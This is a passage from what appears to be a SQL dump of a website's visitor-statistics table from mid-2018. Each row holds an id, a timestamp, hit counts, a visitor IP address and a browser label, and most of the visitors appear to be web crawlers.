,1530344572,1,1,0,0,'54.36.149.102','other'),(264593,1530344841,1,1,0,0,'54.36.148.98','other'),(264594,1530344931,1,1,0,0,'54.36.148.125','other'),(264595,1530344935,1,1,0,0,'54.36.148.52','other'),(264596,1530345036,1,1,0,0,'54.36.149.41','other'),(264597,1530345064,1,1,0,0,'54.36.148.25','other'),(264598,1530345141,1,1,0,0,'46.219.251.215','chrome'),(264599,1530345238,1,1,0,0,'162.210.196.98','other'),(264600,1530345377,12,12,0,0,'157.55.39.96','other'),(264601,1530345385,19,19,0,0,'157.55.39.102','other'),(264602,1530345406,23,23,0,0,'157.55.39.100','other'),(264603,1530345429,16,16,0,0,'157.55.39.97','other'),(264604,1530345625,1,1,0,0,'54.36.148.138','other'),(264605,1530345661,1,1,0,0,'141.8.142.74','other'),(264606,1530345714,1,1,0,0,'178.154.171.88','other'),(264607,1530345732,1,1,0,0,'213.180.203.7','other'),(264608,1530346039,1,1,0,0,'54.36.148.210','other'),(264609,1530346097,1,1,0,0,'54.36.149.85','other'),(264610,1530346186,1,1,0,0,'54.36.148.88','other'),(264611,1530346510,1,1,0,0,'8.29.198.26','other'),(264612,1530346543,1,1,0,0,'54.36.148.104','other'),(264613,1530346805,3,3,0,0,'141.8.142.74','other'),(264614,1530346852,1,1,0,0,'54.165.59.7','other'),(264615,1530347211,1,1,0,0,'54.36.149.72','other'),(264616,1530347312,1,1,0,0,'54.36.148.149','other'),(264617,1530347397,1,1,0,0,'54.36.149.81','other'),(264618,1530347544,1,1,0,0,'54.36.149.61','other'),(264619,1530347590,1,1,0,0,'54.36.149.39','other'),(264620,1530347631,1,1,0,0,'54.36.149.33','other'),(264621,1530347694,1,0,1,0,'66.249.66.57',''),(264622,1530347797,1,1,0,0,'54.36.149.29','other'),(264623,1530347843,1,1,0,0,'54.36.148.179','other'),(264624,1530348004,1,1,0,0,'54.165.59.7','other'),(264625,1530348021,1,1,0,0,'54.36.148.132','other'),(264626,1530348181,1,1,0,0,'54.36.148.59','other'),(264627,1530348223,1,1,0,0,'54.36.148.199','other'),(264628,1530348255,1,1,0,0,'178.154.171.88','other'),(264629,1530348403,1,1,0,0,'54.36.148.243','other'),(264630,1530348460,1,1,0,0,'178.154.171.4','other'),(264631,1530348509,1,1,0,0,'91.196.178.35','chrome'),(264632,1530348548,1,1,0,0,'141.8.142.74','other'),(264633,1530348620,1,1,0,0,'54.36.149.59','other'),(264634,1530349043,1,1,0,0,'91.196.178.101','chrome'),(264635,1530349102,1,1,0,0,'87.250.224.46','other'),(264636,1530349276,1,1,0,0,'54.36.149.16','other'),(264637,1530349325,1,1,0,0,'54.36.148.184','other'),(264638,1530349408,1,1,0,0,'54.36.148.54','other'),(264639,1530349418,1,1,0,0,'54.36.148.117','other'),(264640,1530349428,1,1,0,0,'216.244.66.241','other'),(264641,1530349488,1,1,0,0,'141.8.142.74','other'),(264642,1530349919,1,1,0,0,'54.36.148.150','other'),(264643,1530350286,1,1,0,0,'54.36.148.69','other'),(264644,1530350384,1,0,1,0,'66.249.66.157',''),(264645,1530350700,1,1,0,0,'54.36.148.232','other'),(264646,1530350776,1,1,0,0,'8.29.198.26','other'),(264647,1530350934,1,1,0,0,'54.36.149.92','other'),(264648,1530351067,1,1,0,0,'54.36.148.190','other'),(264649,1530351119,2,2,0,0,'54.36.149.102','other'),(264650,1530351132,1,1,0,0,'141.8.142.74','other'),(264651,1530351146,1,0,1,0,'66.249.66.156',''),(264652,1530351193,2,2,0,0,'87.250.224.46','other'),(264653,1530351270,1,1,0,0,'178.154.171.88','other'),(264654,1530351295,1,1,0,0,'37.9.113.182','other'),(264655,1530351322,1,1,0,0,'54.36.149.84','other'),(264656,1530351623,1,1,0,0,'54.36.149.86','other'),(264657,1530351652,2,2,0,0,'216.244.66.241','other'),(264658,1530351808,1,1,0,0,'54.36.148.37','other'),(264659,1530351852,1,1,0,0,'54.36.148.133','other'),(264660,1530351983,1,1,0,0,'54.36.148.48','other'),(264661,1530352084,1,1,0,0,'54.36.148.179','other'),(264662,1530352141,3,3,0,0,'141.8.142.74','other'),(264663,1530352213,2,2,0,0,'178.154.171.88','other'),(264664,1530352321,1,1,0,0,'54.36.148.185','other'),(264665,1530352397,1,1,0,0,'157.55.39.102','other'),(264666,1530352483,1,1,0,0,'54.36.148.66','other'),(264667,1530352847,1,1,0,0,'54.36.149.87','other'),(264668,1530352880,1,1,0,0,'54.36.148.133','other'),(264669,1530352931,2,2,0,0,'37.9.113.182','other'),(264670,1530353076,1,1,0,0,'54.36.149.103','other'),(264671,1530353096,1,1,0,0,'87.250.224.46','other'),(264672,1530353302,1,1,0,0,'54.36.148.129','other'),(264673,1530353741,2,2,0,0,'178.92.85.85','chrome'),(264674,1530353930,1,1,0,0,'66.249.66.61','chrome'),(264675,1530353996,1,1,0,0,'54.36.148.148','other'),(264676,1530354025,1,1,0,0,'54.36.149.96','other'),(264677,1530354378,1,1,0,0,'141.8.142.74','other'),(264678,1530354416,1,1,0,0,'178.154.171.88','other'),(264679,1530354549,1,1,0,0,'54.36.149.62','other'),(264680,1530354888,1,1,0,0,'54.36.149.6','other'),(264681,1530355188,1,1,0,0,'180.76.15.147','other'),(264682,1530355314,1,1,0,0,'141.8.142.74','other'),(264683,1530355453,1,1,0,0,'54.36.148.180','other'),(264684,1530355577,1,1,0,0,'87.250.224.46','other'),(264685,1530355592,1,1,0,0,'54.36.149.102','other'),(264686,1530355620,1,1,0,0,'54.36.149.99','other'),(264687,1530356016,1,1,0,0,'54.36.148.228','other'),(264688,1530356129,1,1,0,0,'54.36.149.20','other'),(264689,1530356169,1,1,0,0,'54.36.149.69','other'),(264690,1530356305,1,1,0,0,'54.36.148.123','other'),(264691,1530356513,1,1,0,0,'54.36.149.40','other'),(264692,1530356522,1,1,0,0,'54.36.148.131','other'),(264693,1530356558,1,1,0,0,'54.36.148.127','other'),(264694,1530356630,1,1,0,0,'54.36.149.100','other'),(264695,1530356668,1,1,0,0,'178.154.171.60','other'),(264696,1530356733,1,1,0,0,'37.9.113.100','other'),(264697,1530357232,1,1,0,0,'54.36.148.32','other'),(264698,1530357288,2,2,0,0,'178.154.171.88','other'),(264699,1530357349,1,1,0,0,'8.29.198.27','other'),(264700,1530357393,2,2,0,0,'141.8.142.74','other'),(264701,1530357424,1,1,0,0,'54.36.148.169','other'),(264702,1530357477,2,2,0,0,'216.244.66.241','other'),(264703,1530357566,1,1,0,0,'54.36.149.18','other'),(264704,1530357590,1,0,1,0,'66.249.66.59',''),(264705,1530357855,1,1,0,0,'54.36.148.87','other'),(264706,1530358153,1,1,0,0,'54.36.149.62','other'),(264707,1530358244,1,1,0,0,'54.36.149.72','other'),(264708,1530358299,1,1,0,0,'178.154.171.88','other'),(264709,1530358605,1,1,0,0,'54.36.148.229','other'),(264710,1530359044,1,1,0,0,'87.250.224.46','other'),(264711,1530359048,1,1,0,0,'141.8.142.74','other'),(264712,1530359433,1,1,0,0,'54.36.149.97','other'),(264713,1530359704,1,1,0,0,'54.36.148.114','other'),(264714,1530359754,1,1,0,0,'54.36.148.13','other'),(264715,1530359785,1,1,0,0,'54.36.149.80','other'),(264716,1530359788,1,1,0,0,'91.196.177.80','chrome'),(264717,1530359813,2,2,0,0,'54.36.148.19','other'),(264718,1530360134,1,1,0,0,'54.36.148.186','other'),(264719,1530360547,1,1,0,0,'216.244.66.241','other'),(264720,1530360692,1,1,0,0,'54.36.149.55','other'),(264721,1530360717,1,1,0,0,'176.193.181.136','firefox'),(264722,1530360906,2,2,0,0,'87.250.224.46','other'),(264723,1530360920,2,2,0,0,'178.154.171.88','other'),(264724,1530360926,1,1,0,0,'54.36.148.95','other'),(264725,1530360958,1,1,0,0,'37.9.113.182','other'),(264726,1530360994,1,1,0,0,'66.249.66.61','chrome'),(264727,1530361059,1,1,0,0,'141.8.142.74','other'),(264728,1530361162,1,0,1,0,'66.249.66.157',''),(264729,1530361333,1,0,1,0,'66.249.66.156',''),(264730,1530361447,1,1,0,0,'54.36.148.13','other'),(264731,1530361466,1,1,0,0,'54.36.149.92','other'),(264732,1530361576,1,1,0,0,'54.36.148.36','other'),(264733,1530361599,1,1,0,0,'8.29.198.26','other'),(264734,1530361693,1,1,0,0,'54.36.148.51','other'),(264735,1530362144,1,1,0,0,'54.36.148.188','other'),(264736,1530362488,1,1,0,0,'54.36.148.245','other'),(264737,1530362507,1,1,0,0,'216.244.66.241','other'),(264738,1530362545,1,0,1,0,'66.249.66.155',''),(264739,1530362557,1,1,0,0,'54.36.149.43','other'),(264740,1530362676,1,1,0,0,'54.36.148.189','other'),(264741,1530362729,1,1,0,0,'54.36.148.230','other'),(264742,1530362823,1,1,0,0,'87.250.224.46','other'),(264743,1530362913,1,1,0,0,'54.36.148.40','other'),(264744,1530363012,1,1,0,0,'54.36.149.95','other'),(264745,1530363412,1,1,0,0,'54.36.148.44','other'),(264746,1530363540,1,1,0,0,'54.36.148.49','other'),(264747,1530363562,1,1,0,0,'54.36.149.90','other'),(264748,1530363801,1,1,0,0,'141.8.142.74','other'),(264749,1530363926,1,1,0,0,'54.36.148.109','other'),(264750,1530364176,1,1,0,0,'54.36.148.113','other'),(264751,1530364223,1,1,0,0,'54.36.148.64','other'),(264752,1530364263,1,1,0,0,'80.252.155.198','chrome'),(264753,1530364299,1,1,0,0,'54.36.148.121','other'),(264754,1530364608,1,1,0,0,'54.36.148.27','other'),(264755,1530364667,1,1,0,0,'54.36.148.123','other'),(264756,1530365043,1,1,0,0,'37.9.113.182','other'),(264757,1530365218,1,1,0,0,'54.36.148.120','other'),(264758,1530365313,1,1,0,0,'178.154.171.88','other'),(264759,1530365381,1,1,0,0,'141.8.142.74','other'),(264760,1530365526,1,1,0,0,'54.36.149.78','other'),(264761,1530365636,1,1,0,0,'54.36.148.165','other'),(264762,1530365776,1,1,0,0,'54.36.149.16','other'),(264763,1530365808,1,1,0,0,'54.36.149.4','other'),(264764,1530365975,1,1,0,0,'54.36.149.100','other'),(264765,1530366290,1,1,0,0,'54.36.149.8','other'),(264766,1530366304,1,1,0,0,'54.36.149.7','other'),(264767,1530366422,1,1,0,0,'54.36.149.26','other'),(264768,1530366471,1,1,0,0,'141.8.142.74','other'),(264769,1530366665,1,1,0,0,'54.36.149.33','other'),(264770,1530366722,1,1,0,0,'54.36.148.119','other'),(264771,1530366738,1,1,0,0,'54.36.148.250','other'),(264772,1530366921,2,2,0,0,'178.92.85.85','chrome'),(264773,1530366997,1,1,0,0,'54.36.149.75','other'),(264774,1530367000,1,1,0,0,'54.36.148.26','other'),(264775,1530367124,1,1,0,0,'54.36.149.87','other'),(264776,1530367372,1,1,0,0,'54.36.149.22','other'),(264777,1530367569,1,1,0,0,'178.154.171.86','other'),(264778,1530367577,1,1,0,0,'213.180.203.37','other'),(264779,1530367580,1,1,0,0,'216.244.66.241','other'),(264780,1530367671,1,1,0,0,'141.8.142.74','other'),(264781,1530367736,1,0,1,0,'66.249.66.61',''),(264782,1530367844,1,1,0,0,'54.36.148.35','other'),(264783,1530367991,1,0,1,0,'66.249.66.155',''),(264784,1530368013,1,1,0,0,'54.36.148.145','other'),(264785,1530368086,1,1,0,0,'54.36.149.45','other'),(264786,1530368131,1,1,0,0,'66.249.66.59','chrome'),(264787,1530368182,1,1,0,0,'8.29.198.27','other'),(264788,1530368190,1,1,0,0,'178.154.171.88','other'),(264789,1530368560,1,1,0,0,'54.36.148.158','other'),(264790,1530368570,1,1,0,0,'54.36.148.106','other'),(264791,1530368656,1,1,0,0,'54.36.148.97','other'),(264792,1530368658,1,1,0,0,'46.149.93.215','chrome'),(264793,1530368711,1,1,0,0,'54.36.148.147','other'),(264794,1530368861,1,1,0,0,'54.36.148.54','other'),(264795,1530368869,1,1,0,0,'54.36.149.52','other'),(264796,1530368930,1,1,0,0,'54.36.148.199','other'),(264797,1530368935,1,1,0,0,'54.36.148.138','other'),(264798,1530369176,1,1,0,0,'54.36.148.128','other'),(264799,1530369225,1,1,0,0,'157.55.39.100','other'),(264800,1530369376,1,1,0,0,'54.36.148.101','other'),(264801,1530369522,1,1,0,0,'157.55.39.102','other'),(264802,1530369630,1,1,0,0,'54.36.149.3','other'),(264803,1530369657,2,2,0,0,'178.154.171.88','other'),(264804,1530369797,1,0,1,0,'66.249.66.156',''),(264805,1530369916,1,1,0,0,'213.202.254.136','opera'),(264806,1530369924,1,1,0,0,'136.243.75.132','other'),(264807,1530370050,1,1,0,0,'54.36.149.69','other'),(264808,1530370089,1,1,0,0,'54.36.148.162','other'),(264809,1530370479,1,1,0,0,'54.36.148.203','other'),(264810,1530370514,1,1,0,0,'95.163.255.99','other'),(264811,1530370691,1,1,0,0,'54.36.149.101','other'),(264812,1530370980,1,1,0,0,'54.36.148.51','other'),(264813,1530370995,1,1,0,0,'54.36.148.148','other'),(264814,1530371032,1,1,0,0,'54.36.148.48','other'),(264815,1530371264,1,0,1,0,'66.249.66.57',''),(264816,1530371272,1,1,0,0,'87.250.224.46','other'),(264817,1530371626,1,1,0,0,'54.36.148.134','other'),(264818,1530371697,1,1,0,0,'54.36.148.36','other'),(264819,1530371759,1,1,0,0,'54.36.148.216','other'),(264820,1530371764,1,1,0,0,'54.36.148.196','other'),(264821,1530371781,1,1,0,0,'54.36.148.167','other'),(264822,1530371906,1,1,0,0,'178.154.171.88','other'),(264823,1530371918,1,1,0,0,'91.196.178.67','firefox'),(264824,1530372253,1,1,0,0,'87.250.224.46','other'),(264825,1530372289,1,1,0,0,'54.36.148.56','other'),(264826,1530372339,1,1,0,0,'54.36.148.34','other'),(264827,1530372450,1,1,0,0,'8.29.198.26','other'),(264828,1530372474,2,2,0,0,'141.8.142.74','other'),(264829,1530372487,1,1,0,0,'54.36.148.138','other'),(264830,1530372856,1,1,0,0,'54.36.148.248','other'),(264831,1530373678,1,1,0,0,'87.250.224.46','other'),(264832,1530373688,1,1,0,0,'37.9.113.101','other'),(264833,1530373713,1,1,0,0,'91.209.11.236','other'),(264834,1530373865,1,1,0,0,'178.154.171.88','other'),(264835,1530374003,1,1,0,0,'54.36.149.5','other'),(264836,1530374150,1,1,0,0,'54.36.149.90','other'),(264837,1530374171,2,2,0,0,'91.196.178.36','chrome'),(264838,1530374207,1,1,0,0,'54.36.148.183','other'),(264839,1530374433,1,1,0,0,'54.36.149.70','other'),(264840,1530374514,1,1,0,0,'54.36.148.176','other'),(264841,1530374544,1,1,0,0,'54.36.148.153','other'),(264842,1530374545,1,1,0,0,'54.36.148.202','other'),(264843,1530374784,1,1,0,0,'141.8.142.74','other'),(264844,1530374821,1,1,0,0,'54.36.149.22','other'),(264845,1530375166,1,1,0,0,'54.36.149.69','other'),(264846,1530375293,1,1,0,0,'54.36.148.87','other'),(264847,1530375326,1,1,0,0,'54.36.148.104','other'),(264848,1530375393,1,1,0,0,'66.249.66.57','chrome'),(264849,1530375400,1,1,0,0,'54.36.148.178','other'),(264850,1530375621,1,1,0,0,'54.36.149.43','other'),(264851,1530376021,1,1,0,0,'54.36.148.89','other'),(264852,1530376276,1,1,0,0,'178.154.171.88','other'),(264853,1530376356,1,1,0,0,'54.36.149.5','other'),(264854,1530376636,1,1,0,0,'173.249.24.45','chrome'),(264855,1530376724,1,1,0,0,'54.36.149.53','other'),(264856,1530376995,1,1,0,0,'54.36.148.66','other'),(264857,1530377077,1,1,0,0,'54.36.148.43','other'),(264858,1530377179,1,1,0,0,'66.249.66.61','chrome'),(264859,1530377344,1,1,0,0,'66.249.66.157','chrome'),(264860,1530377396,1,1,0,0,'54.36.149.92','other'),(264861,1530377482,1,1,0,0,'54.36.148.182','other'),(264862,1530378016,1,1,0,0,'54.36.148.239','other'),(264863,1530378191,1,1,0,0,'54.36.148.169','other'),(264864,1530378241,1,1,0,0,'54.36.148.22','other'),(264865,1530378244,1,1,0,0,'54.36.149.74','other'),(264866,1530378578,1,1,0,0,'54.36.148.103','other'),(264867,1530378583,3,3,0,0,'216.244.66.241','other'),(264868,1530378807,45,45,0,0,'157.55.39.102','other'),(264869,1530378873,2,2,0,0,'141.8.142.74','other'),(264870,1530378953,1,1,0,0,'54.36.148.60','other'),(264871,1530379031,1,1,0,0,'8.29.198.26','other'),(264872,1530379081,1,1,0,0,'54.36.148.222','other'),(264873,1530379218,1,1,0,0,'54.36.149.30','other'),(264874,1530379395,1,1,0,0,'54.36.149.22','other'),(264875,1530379404,36,36,0,0,'157.55.39.96','other'),(264876,1530379463,30,30,0,0,'157.55.39.97','other'),(264877,1530379492,43,43,0,0,'157.55.39.100','other'),(264878,1530379799,1,1,0,0,'54.36.149.52','other'),(264879,1530379806,1,1,0,0,'37.9.113.157','other'),(264880,1530379860,1,1,0,0,'178.154.171.88','other'),(264881,1530379913,1,1,0,0,'54.36.148.93','other'),(264882,1530380076,1,1,0,0,'54.36.148.89','other'),(264883,1530380077,1,1,0,0,'54.36.148.127','other'),(264884,1530380139,1,1,0,0,'54.36.148.217','other'),(264885,1530380261,1,1,0,0,'141.8.142.74','other'),(264886,1530380408,1,1,0,0,'54.36.148.20','other'),(264887,1530380724,1,1,0,0,'216.244.66.241','other'),(264888,1530380735,1,1,0,0,'141.8.132.19','other'),(264889,1530380741,1,1,0,0,'54.36.148.136','other'),(264890,1530380823,1,1,0,0,'54.36.149.51','other'),(264891,1530380921,1,1,0,0,'54.36.148.100','other'),(264892,1530381258,1,1,0,0,'54.36.149.78','other'),(264893,1530381456,1,1,0,0,'54.36.149.40','other'),(264894,1530381513,1,1,0,0,'54.36.149.82','other'),(264895,1530381521,1,1,0,0,'54.36.148.43','other'),(264896,1530381664,1,1,0,0,'54.36.149.76','other'),(264897,1530381719,1,1,0,0,'141.8.142.74','other'),(264898,1530381869,1,1,0,0,'216.244.66.241','other'),(264899,1530381890,1,1,0,0,'54.36.148.168','other'),(264900,1530382072,1,1,0,0,'87.250.224.46','other'),(264901,1530382073,1,1,0,0,'54.36.148.249','other'),(264902,1530382212,1,1,0,0,'193.194.127.222','firefox'),(264903,1530382308,1,0,1,0,'66.249.66.157',''),(264904,1530382407,1,1,0,0,'54.36.148.112','other'),(264905,1530382461,1,1,0,0,'178.154.171.88','other'),(264906,1530382462,1,1,0,0,'54.36.148.108','other'),(264907,1530382558,1,1,0,0,'54.36.149.105','other'),(264908,1530382597,1,1,0,0,'54.36.148.186','other'),(264909,1530382654,1,1,0,0,'66.249.66.57','chrome'),(264910,1530382749,1,1,0,0,'54.36.149.9','other'),(264911,1530382895,1,1,0,0,'216.244.66.241','other'),(264912,1530383213,1,1,0,0,'178.208.83.38','msie'),(264913,1530383216,1,1,0,0,'178.208.83.38','firefox'),(264914,1530383218,10,10,0,0,'178.208.83.38','opera'),(264915,1530383219,1,1,0,0,'54.36.148.59','other'),(264916,1530383286,1,1,0,0,'8.29.198.25','other'),(264917,1530383453,1,1,0,0,'54.36.148.224','other'),(264918,1530383454,1,1,0,0,'54.36.148.247','other'),(264919,1530383497,1,1,0,0,'54.36.149.68','other'),(264920,1530383499,1,1,0,0,'178.154.171.88','other'),(264921,1530383517,1,1,0,0,'54.36.148.248','other'),(264922,1530383601,1,1,0,0,'54.36.148.147','other'),(264923,1530383682,1,1,0,0,'54.36.148.212','other'),(264924,1530383726,1,1,0,0,'54.36.148.11','other'),(264925,1530383886,1,0,1,0,'66.249.66.155',''),(264926,1530384037,1,1,0,0,'54.36.148.35','other'),(264927,1530384337,1,1,0,0,'54.36.148.133','other'),(264928,1530384359,1,1,0,0,'141.8.142.74','other'),(264929,1530384467,1,1,0,0,'87.250.224.46','other'),(264930,1530384535,1,1,0,0,'216.244.66.241','other'),(264931,1530384589,1,1,0,0,'54.36.148.39','other'),(264932,1530384773,1,1,0,0,'54.36.148.57','other'),(264933,1530385087,1,1,0,0,'54.36.148.118','other'),(264934,1530385303,1,1,0,0,'54.36.149.21','other'),(264935,1530385421,1,1,0,0,'178.154.171.88','other'),(264936,1530385505,1,1,0,0,'54.36.148.136','other'),(264937,1530385598,1,1,0,0,'87.250.224.46','other'),(264938,1530385738,1,1,0,0,'54.36.149.61','other'),(264939,1530385781,1,1,0,0,'54.36.149.93','other'),(264940,1530385886,1,1,0,0,'54.36.149.85','other'),(264941,1530386309,1,1,0,0,'54.36.148.101','other'),(264942,1530386326,1,1,0,0,'54.36.148.191','other'),(264943,1530386382,1,1,0,0,'54.36.149.51','other'),(264944,1530386436,2,2,0,0,'178.154.171.88','other'),(264945,1530386676,1,1,0,0,'54.36.149.97','other'),(264946,1530386714,1,1,0,0,'216.244.66.241','other'),(264947,1530386836,1,1,0,0,'37.73.157.4','chrome'),(264948,1530386968,1,1,0,0,'54.36.148.73','other'),(264949,1530386998,2,2,0,0,'141.8.142.74','other'),(264950,1530387043,2,2,0,0,'178.92.85.85','chrome'),(264951,1530387236,1,1,0,0,'54.36.148.39','other'),(264952,1530387438,1,1,0,0,'54.36.149.95','other'),(264953,1530387566,1,1,0,0,'54.36.148.154','other'),(264954,1530387731,1,1,0,0,'54.36.148.145','other'),(264955,1530388023,1,1,0,0,'54.36.148.137','other'),(264956,1530388117,1,1,0,0,'87.250.224.46','other'),(264957,1530388159,2,2,0,0,'178.154.171.88','other'),(264958,1530388375,12,12,0,0,'23.237.4.26','other'),(264959,1530388378,1,1,0,0,'54.36.148.211','other'),(264960,1530388412,1,1,0,0,'54.36.149.26','other'),(264961,1530388438,1,1,0,0,'216.244.66.241','other'),(264962,1530388586,1,1,0,0,'54.36.148.173','other'),(264963,1530388931,1,1,0,0,'54.36.149.37','other'),(264964,1530389020,1,1,0,0,'54.36.149.84','other'),(264965,1530389351,1,1,0,0,'54.36.148.194','other'),(264966,1530389688,1,1,0,0,'66.249.66.57','chrome'),(264967,1530389874,2,2,0,0,'141.8.142.74','other'),(264968,1530389877,1,1,0,0,'8.29.198.27','other'),(264969,1530389880,3,3,0,0,'178.154.171.88','other'),(264970,1530389891,1,1,0,0,'54.36.148.175','other'),(264971,1530389922,1,1,0,0,'54.36.148.244','other'),(264972,1530389923,1,1,0,0,'216.244.66.241','other'),(264973,1530389945,1,1,0,0,'66.249.66.156','chrome'),(264974,1530390075,1,0,1,0,'66.249.66.155',''),(264975,1530390318,1,1,0,0,'37.204.196.14','chrome'),(264976,1530390473,1,1,0,0,'180.76.15.163','other'),(264977,1530390892,1,1,0,0,'54.36.148.87','other'),(264978,1530391539,1,1,0,0,'87.250.224.46','other'),(264979,1530391564,2,0,2,0,'66.249.66.155',''),(264980,1530391689,2,2,0,0,'178.154.171.88','other'),(264981,1530391757,1,0,1,0,'66.249.66.61',''),(264982,1530392050,1,0,1,0,'66.249.66.59',''),(264983,1530392117,1,1,0,0,'54.36.148.158','other'),(264984,1530392317,1,1,0,0,'54.36.148.196','other'),(264985,1530392338,1,1,0,0,'54.36.148.57','other'),(264986,1530392404,1,1,0,0,'54.36.149.36','other'),(264987,1530392435,1,1,0,0,'178.154.200.41','other'),(264988,1530392442,1,1,0,0,'157.55.39.96','other'),(264989,1530392537,1,1,0,0,'54.36.148.166','other'),(264990,1530392539,1,1,0,0,'54.36.148.135','other'),(264991,1530392747,1,1,0,0,'54.36.148.123','other'),(264992,1530393130,1,1,0,0,'54.36.149.107','other'),(264993,1530393315,1,1,0,0,'54.36.148.203','other'),(264994,1530393320,1,1,0,0,'54.36.148.197','other'),(264995,1530393349,1,1,0,0,'54.36.148.163','other'),(264996,1530393412,1,1,0,0,'46.133.148.0','chrome'),(264997,1530393460,1,1,0,0,'54.36.148.167','other'),(264998,1530393588,2,2,0,0,'216.244.66.241','other'),(264999,1530393619,1,1,0,0,'66.249.66.157','chrome'),(265000,1530393693,1,1,0,0,'54.36.149.28','other'),(265001,1530393725,1,1,0,0,'178.212.111.37','chrome'),(265002,1530393778,1,1,0,0,'54.36.148.125','other'),(265003,1530393983,1,1,0,0,'213.202.254.136','opera'),(265004,1530394020,1,1,0,0,'54.36.148.62','other'),(265005,1530394080,1,1,0,0,'54.36.148.39','other'),(265006,1530394121,1,1,0,0,'8.29.198.25','other'),(265007,1530394139,1,1,0,0,'54.36.149.65','other'),(265008,1530394192,2,2,0,0,'95.163.255.93','other'),(265009,1530394217,1,1,0,0,'54.36.148.174','other'),(265010,1530394494,1,1,0,0,'54.36.148.67','other'),(265011,1530394649,1,1,0,0,'54.36.148.139','other'),(265012,1530394755,1,1,0,0,'54.36.148.93','other'),(265013,1530394769,1,1,0,0,'54.36.148.100','other'),(265014,1530394859,1,1,0,0,'54.36.149.37','other'),(265015,1530394882,1,1,0,0,'54.36.149.73','other'),(265016,1530394935,1,1,0,0,'54.36.148.176','other'),(265017,1530394983,1,1,0,0,'157.55.39.96','other'),(265018,1530395182,1,1,0,0,'54.36.148.159','other'),(265019,1530395345,1,1,0,0,'54.36.148.200','other'),(265020,1530395365,1,1,0,0,'54.36.148.216','other'),(265021,1530395427,1,1,0,0,'178.154.171.88','other'),(265022,1530395550,1,1,0,0,'54.36.148.254','other'),(265023,1530395626,1,1,0,0,'54.36.148.168','other'),(265024,1530395740,3,3,0,0,'141.8.142.74','other'),(265025,1530395962,1,1,0,0,'157.55.39.100','other'),(265026,1530396005,1,1,0,0,'54.36.149.106','other'),(265027,1530396173,1,1,0,0,'193.53.83.25','chrome'),(265028,1530396304,1,1,0,0,'54.36.148.245','other'),(265029,1530396599,1,1,0,0,'66.249.66.157','chrome'),(265030,1530396670,1,1,0,0,'54.36.149.35','other'),(265031,1530396741,1,1,0,0,'54.36.149.76','other'),(265032,1530396902,1,1,0,0,'66.249.66.61','chrome'),(265033,1530396958,1,1,0,0,'54.36.149.107','other'),(265034,1530396962,1,1,0,0,'54.36.149.49','other'),(265035,1530396970,2,2,0,0,'87.250.224.46','other'),(265036,1530397200,1,1,0,0,'141.8.142.74','other'),(265037,1530397223,2,0,2,0,'66.249.66.156',''),(265038,1530397235,1,1,0,0,'178.154.171.88','other'),(265039,1530397527,1,1,0,0,'54.36.149.79','other'),(265040,1530397585,1,1,0,0,'54.36.148.127','other'),(265041,1530397586,1,1,0,0,'54.36.148.194','other'),(265042,1530397610,1,1,0,0,'54.36.149.50','other'),(265043,1530397840,1,1,0,0,'54.36.149.10','other'),(265044,1530397871,1,1,0,0,'54.36.149.77','other'),(265045,1530397948,1,1,0,0,'54.36.148.49','other'),(265046,1530398352,1,0,1,0,'66.249.66.155',''),(265047,1530398457,1,1,0,0,'87.250.224.46','other'),(265048,1530398629,1,1,0,0,'54.36.149.2','other'),(265049,1530398796,1,1,0,0,'95.163.255.95','other'),(265050,1530398797,1,1,0,0,'54.36.149.49','other'),(265051,1530398805,1,1,0,0,'54.36.148.175','other'),(265052,1530398832,1,1,0,0,'54.36.148.59','other'),(265053,1530399021,1,1,0,0,'54.36.149.67','other'),(265054,1530399312,1,1,0,0,'95.163.255.97','other'),(265055,1530399518,2,2,0,0,'141.8.142.74','other'),(265056,1530399600,1,1,0,0,'54.36.148.107','other'),(265057,1530399722,1,1,0,0,'54.36.148.204','other'),(265058,1530399976,3,3,0,0,'178.154.171.88','other'),(265059,1530400147,1,1,0,0,'157.55.39.100','other'),(265060,1530400223,1,1,0,0,'54.36.148.164','other'),(265061,1530400349,1,1,0,0,'54.36.148.232','other'),(265062,1530400373,1,1,0,0,'54.36.149.83','other'),(265063,1530400445,1,1,0,0,'141.8.142.74','other'),(265064,1530400589,1,1,0,0,'87.250.224.46','other'),(265065,1530400660,1,1,0,0,'54.36.149.17','other'),(265066,1530400709,1,0,1,0,'66.249.66.157',''),(265067,1530400722,1,1,0,0,'8.29.198.25','other'),(265068,1530400821,1,1,0,0,'54.36.148.35','other'),(265069,1530400980,1,1,0,0,'54.36.148.181','other'),(265070,1530401144,1,1,0,0,'54.36.148.41','other'),(265071,1530401355,1,1,0,0,'54.36.148.88','other'),(265072,1530401405,1,1,0,0,'193.194.127.143','chrome'),(265073,1530401475,1,1,0,0,'54.36.148.230','other'),(265074,1530402113,1,1,0,0,'54.36.149.43','other'),(265075,1530402158,3,3,0,0,'178.154.171.88','other'),(265076,1530402202,1,1,0,0,'54.36.148.150','other'),(265077,1530402244,1,1,0,0,'54.36.149.27','other'),(265078,1530402253,1,1,0,0,'87.250.224.46','other'),(265079,1530402385,1,1,0,0,'141.8.142.74','other'),(265080,1530402550,1,1,0,0,'157.55.39.96','other'),(265081,1530403296,1,1,0,0,'54.36.148.84','other'),(265082,1530403486,1,1,0,0,'216.244.66.241','other'),(265083,1530403573,1,1,0,0,'54.36.148.64','other'),(265084,1530403598,1,1,0,0,'54.36.148.86','other'),(265085,1530403734,1,1,0,0,'54.36.148.228','other'),(265086,1530403998,1,1,0,0,'178.154.171.88','other'),(265087,1530404060,1,1,0,0,'54.36.148.187','other'),(265088,1530404138,2,1,1,0,'66.249.66.59',''),(265089,1530404161,1,1,0,0,'54.36.148.155','other'),(265090,1530404232,4,4,0,0,'141.8.142.74','other'),(265091,1530404329,2,0,2,0,'66.249.66.156',''),(265092,1530404430,1,1,0,0,'54.36.148.184','other'),(265093,1530404478,1,1,0,0,'54.36.148.17','other'),(265094,1530404671,2,0,2,0,'66.249.66.157',''),(265095,1530404945,1,1,0,0,'8.29.198.25','other'),(265096,1530404961,1,1,0,0,'95.163.255.98','other'),(265097,1530405005,1,1,0,0,'54.36.148.199','other'),(265098,1530405240,1,1,0,0,'180.76.15.157','other'),(265099,1530405276,1,1,0,0,'54.36.149.85','other'),(265100,1530405384,1,1,0,0,'54.36.148.25','other'),(265101,1530405406,1,1,0,0,'54.36.148.38','other'),(265102,1530405507,1,1,0,0,'54.36.148.48','other'),(265103,1530405614,2,2,0,0,'216.244.66.241','other'),(265104,1530405918,1,1,0,0,'54.36.148.119','other'),(265105,1530406062,1,1,0,0,'54.36.149.43','other'),(265106,1530406079,1,1,0,0,'54.36.148.170','other'),(265107,1530406177,1,0,1,0,'66.2